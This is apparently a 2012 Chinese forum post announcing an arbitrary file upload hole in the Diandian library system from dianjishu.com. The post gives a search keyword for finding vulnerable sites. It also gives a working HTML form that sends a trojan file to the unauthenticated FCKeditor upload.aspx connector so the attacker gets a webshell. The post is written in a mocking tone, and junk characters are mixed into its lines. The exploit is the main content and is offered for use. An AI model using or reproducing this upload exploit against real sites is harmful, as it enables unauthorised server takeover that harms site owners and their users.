主题:图书馆系统任意文件上传漏洞
' x" A) J& }7 Q, p6 J- ]" h8 { 作者:冰锋刺客6 r: x+ J- a/ i% ^( b M/ s
厂商:点击书(dianjishu.com)# I% c! E8 c2 A+ D2 {! h
日期:2012-6-21
1 Y1 N1 c5 r, J& E9 U4 s
0 j) m) B6 `6 ~/ N* l4 @I 概述# _% \% d6 R8 Y" j0 V& o# B
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell2 m" j) j7 d/ h8 K9 G, R* c, D' z* C6 l
II 简介& p" n' ?# m" N J9 W. D
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"0 l8 t" }+ D3 o6 r6 C
补充一个漏洞0 k" P* X* @3 A) _, q1 L- A3 D' G
<form id="frmUpload" enctype="multipart/form-data"
, r. g4 G2 j% w# A P action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
4 i8 ]5 H. @" E( V7 L <input id="btnUpload" type="submit" value="操翻他">. E1 i* c/ P: z- X0 V1 a' |2 [" ~
</form>
) Z. H0 W8 [9 @. Z. H/ W5 [ 你们懂的
) B4 ]5 M3 j9 S& Z 那傻逼提供还需要改包.3 ?; ~- D7 S* a, n: K
自己看了下源代码发现fckeditor
! `% D. W1 Q8 N4 ^- ` 直接秒杀
5 e- T% u% L1 t/ Y$ y |
发表于 2012-9-10 21:20:59
收藏
支持
反对